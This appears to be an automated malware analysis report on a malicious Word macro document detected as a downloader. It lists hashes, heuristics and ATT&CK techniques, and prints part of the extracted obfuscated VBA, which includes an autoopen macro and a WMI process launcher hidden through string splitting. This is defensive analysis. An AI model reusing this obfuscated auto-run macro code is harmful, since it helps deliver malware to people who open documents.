Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 acaa26d978decd75…

MALICIOUS

Office (OLE)

Size: 145.9 KB
Created: 2019-05-01 12:11:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 36c83af1ec1f89d1a4c4e81e92250def
SHA-1: b124ab7f0ca731ba27add6b8249ed8d1f65fe8e4
SHA-256: acaa26d978decd75aae429b5e4feec5108f99a044c6d6a0d217272578343626c
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains VBA macros that use `GetObject` and `CreateObject` to interact with WMI, specifically to launch `Win32_Process`. This is a common technique for executing arbitrary code or downloading secondary payloads. The obfuscation of the `winmgmts` string (split across concatenated literals so that no single literal contains the moniker) further indicates malicious intent, and the ClamAV detection corroborates it.

Heuristics (9)

  • ClamAV: Doc.Downloader.00536d-6959611-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.00536d-6959611-0
  • VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE)
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 22195 bytes
SHA-256: e83cc570cb6357be277f1dc36db1cc0690e45808062ad6164426982050a5a33d
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "MADQAZBX"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "zA_GcBBC"
Attribute VB_Base = "0{E5FABED2-5D09-470B-AB68-4DE1B02D2F08}{C296A562-7B4E-476A-8752-2E5E5EBF083F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lAZoQGB"

Attribute VB_Name = "jGDAwAA"

Attribute VB_Name = "aAAXxQAo"

Attribute VB_Name = "BxABBwA"

Attribute VB_Name = "zCA_U1A"
Attribute VB_Base = "0{860FD737-E3D9-4B12-83F4-26073074266A}{6430A8A0-A2EC-47F2-A4A7-D1F0E89475C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "rZAxCUB"
Function K_QDQDD(CQCAA_)
   Select Case GAA4xoA
Case 562220402
Minute CInt(172368050 _
- Tan(iDxQk_AA * Cos(vUADA_) + _
612781366 + 928404273))
End Select
   Select Case nAxwCA1
Case 722578661
Minute CInt(217345090 _
- Tan(sAGDBUAA * Cos(IAAAAUA) + _
609068523 + 878158039))
End Select
   Select Case F_AADAQ
Case 504802116
Minute CInt(269409384 _
- Tan(VGABZAQU * Cos(joU1BBk) + _
285758612 + 495812894))
End Select
Set K_QDQDD = CVar(CQCAA_)
   Select Case joXGAQ
Case 642372825
Minute CInt(857527804 _
- Tan(cADGAA * Cos(UCXcAAAA) + _
265654494 + 540685068))
End Select
   Select Case SC4AAow
Case 20847050
Minute CInt(986330889 _
- Tan(Rw4UAA * Cos(nCAGUQ) + _
269843009 + 574981606))
End Select
   Select Case sUBAAAB4
Case 455227288
Minute CInt(253047170 _
- Tan(vA_UAB * Cos(zAcwQwUA) + _
933209543 + 74908986))
End Select
End Function
Sub autoopen()
   Select Case KAAXAZ
Case 642497119
Minute CInt(181703225 _
- Tan(JGxAA4cc * Cos(hAxkGDAc) + _
664103252 + 685957492))
End Select
   Select Case XGG4GD
Case 703799256
Minute CInt(81578945 _
- Tan(U1UAAAQ * Cos(CBAX4Bx) + _
909336882 + 617387229))
End Select
   Select Case A_AACA
Case 900650784
Minute CInt(241955921 _
- Tan(fo1AA_DA * Cos(JUUxAc) + _
573758774 + 653526745))
End Select
Call KwQQAX
   Select Case b4kZ4wD_
Case 705372864
Minute CInt(57839682 _
- Tan(DU_XAA * Cos(aAAGcGZD) + _
830160224 + 203800841))
End Select
   Select Case qDAAA14
Case 395176598
Minute CInt(931474604 _
- Tan(m_cQUA * Cos(iABBBG) + _
272367672 + 425762302))
End Select
   Select Case lUA1A1A
Case 73545898
Minute CInt(435462980 _
- Tan(CAAADAAo * Cos(qAAwXGAA) + _
852514816 + 45840680))
End Select
End Sub


Attribute VB_Name = "FCxXwA"
Function KwQQAX()
On Error Resume Next
   Select Case FDcABxUC
Case 626636184
Minute CInt(531242096 _
- Tan(qoAAA1xA * Cos(cAUADkA) + _
616431418 + 553143818))
End Select
   Select Case DGwAkxA
Case 779757640
Minute CInt(689477681 _
- Tan(qDAAAo_ * Cos(KUAG_B1A) + _
853526271 + 339676429))
End Select
   Select Case bAUBDBG
Case 533436387
Minute CInt(957147201 _
- Tan(rAGoUwQA * Cos(qAQBXG) + _
538258994 + 562243367))
End Select
Set VcAAXDD = K_QDQDD(GetObject("w" + "inmgmts:W" + "in32_Process" + "Sta" + "rtup"))
   Select Case KDXAXDC
Case 201267541
Minute CInt(345682419 _
- Tan(LU_AQ1 * Cos(dCXAxoA) + _
792458517 + 442369741))
End Select
   Select Case QAAAwA4
Case 683066449
Minute CInt(563040337 _
- Tan(oAAADDAQ * Cos(aAAU1UxB) + _
656105962 + 858600647))
End Select
EwU_AA = vbError - vbError
   Select Case l1wAoDD
Case 780749121
Minute CInt(382246454 _
- Tan(HoACUA * Cos(YBAABABw) + _
263297230 + 64874686))
End Select
   Select Case KCAwCAAx
Case 678107768
Minute CInt(396623115 _
- Tan(oBAAUAkA * Cos(dZwQADwB) + _
910934091 + 957431707))
End Select
   Select Case NQAUBU
Case 939437504
Minute CInt(530405962 _
- Tan(oQ
... (truncated)